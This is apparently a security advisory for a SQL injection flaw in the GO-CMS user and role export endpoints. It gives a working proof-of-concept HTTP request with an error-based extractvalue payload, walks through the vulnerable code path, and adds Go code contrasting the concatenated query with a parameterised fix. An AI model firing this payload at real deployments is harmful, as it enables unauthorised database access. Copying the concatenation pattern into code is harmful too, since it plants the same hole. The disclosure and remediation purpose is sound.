Author: wjlin0
Revised: 2024-12-11 12:01:22

0x01 Vulnerability Summary

Description: In GO-CMS <=1.11.0, the export of the user/role tables concatenates the supplied id values directly into the SQL query, allowing an attacker with access to the export interface to perform SQL injection.

Vulnerable source: GO-CMS-1.1.10.zip

Project URL: https://github.com/Xi-Yuer/GO-CMS/

Severity

Affected versions: <=1.1.10

Vulnerable URL

0x02 Vulnerability Details

1. Reproduction

Triggering the vulnerability requires permission to call the interface above. The following PoC request was constructed:

POST /cms/roles/export HTTP/1.1
Host: localhost:5173
Content-Length: 73
sec-ch-ua-platform: "macOS"
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.Cd2CJg1TpqdkSn3F2F1LZlfUeH7hGxclLD34PH7zzK8
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not?A_Brand";v="99", "Chromium";v="130"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: application/json, text/plain, */*
Content-Type: application/json
Origin: http://localhost:5173
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:5173/
Accept-Encoding: gzip, deflate, br
Cookie: Phpstorm-f30b1e9e=0694f073-c92a-4934-afee-c48c22785c21; Goland-852c6800=72bd19d4-b952-464f-9518-4cf4be331da3; device_id=61941ffb39fe4eafa03839d648f83ed5; FUCNdjYGFg4G=MTczMzg3OTIyNXxEWDhFQVFMX2dBQUJFQUVRQUFBRV80QUFBQT09fH-QTxZOkvnjo5WwV5AqR_ilvvDPSEgjD7WXHb4XSkfi
Connection: keep-alive

{"ids":["1) and extractvalue('~',concat('~',(select database()))) --  "]}


Likewise, exporting the table from the user module triggers the same SQL injection.


2. Source Code Analysis

Taking the user table export as the example: when the attacker sends the malicious payload, the controllers.UserController.ExportExcel controller is invoked first.


The controller reads the ids field from the JSON body and calls services.UserService.ExportExcel.


This in turn calls repositories.UserRepositorysModules.ExportExcel.


In this function the ids passed in are joined with commas and appended directly to the query string, with no validation or parameter binding.


The malicious statement is ultimately executed by the database.

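
The concatenation pattern described above beside its hardened form, as an added example (not GO-CMS's own code): each id is validated as a positive integer and bound through a placeholder instead of being spliced into the SQL text. The table name users and both function names are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// vulnerableQuery reconstructs the pattern described on this page: the ids
// from the request are joined with commas and concatenated straight into the
// SQL text. (Illustration of the described pattern, not the project's code.)
func vulnerableQuery(ids []string) string {
	return "SELECT * FROM users WHERE id IN (" + strings.Join(ids, ",") + ")"
}

// safeExportQuery is the hardened form: every id must parse as a positive
// integer, and the query uses one '?' placeholder per id so the driver sends
// the values separately from the SQL text.
func safeExportQuery(ids []string) (string, []interface{}, error) {
	if len(ids) == 0 {
		return "", nil, errors.New("no ids supplied")
	}
	placeholders := make([]string, 0, len(ids))
	args := make([]interface{}, 0, len(ids))
	for _, raw := range ids {
		id, err := strconv.ParseInt(strings.TrimSpace(raw), 10, 64)
		if err != nil || id <= 0 {
			return "", nil, fmt.Errorf("invalid id %q", raw)
		}
		placeholders = append(placeholders, "?")
		args = append(args, id)
	}
	query := "SELECT * FROM users WHERE id IN (" + strings.Join(placeholders, ",") + ")"
	return query, args, nil
}

func main() {
	// Constructed input: the payload from the PoC request above.
	malicious := []string{"1) and extractvalue('~',concat('~',(select database()))) --  "}
	fmt.Println("vulnerable:", vulnerableQuery(malicious))
	if _, _, err := safeExportQuery(malicious); err != nil {
		fmt.Println("hardened:", err)
	}
	q, args, _ := safeExportQuery([]string{"1", "2", "3"})
	fmt.Println("hardened:", q, args)
}
```

The returned query and args are meant to be passed to the driver together (for example db.Query(q, args...)), so the values never become part of the parsed SQL.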
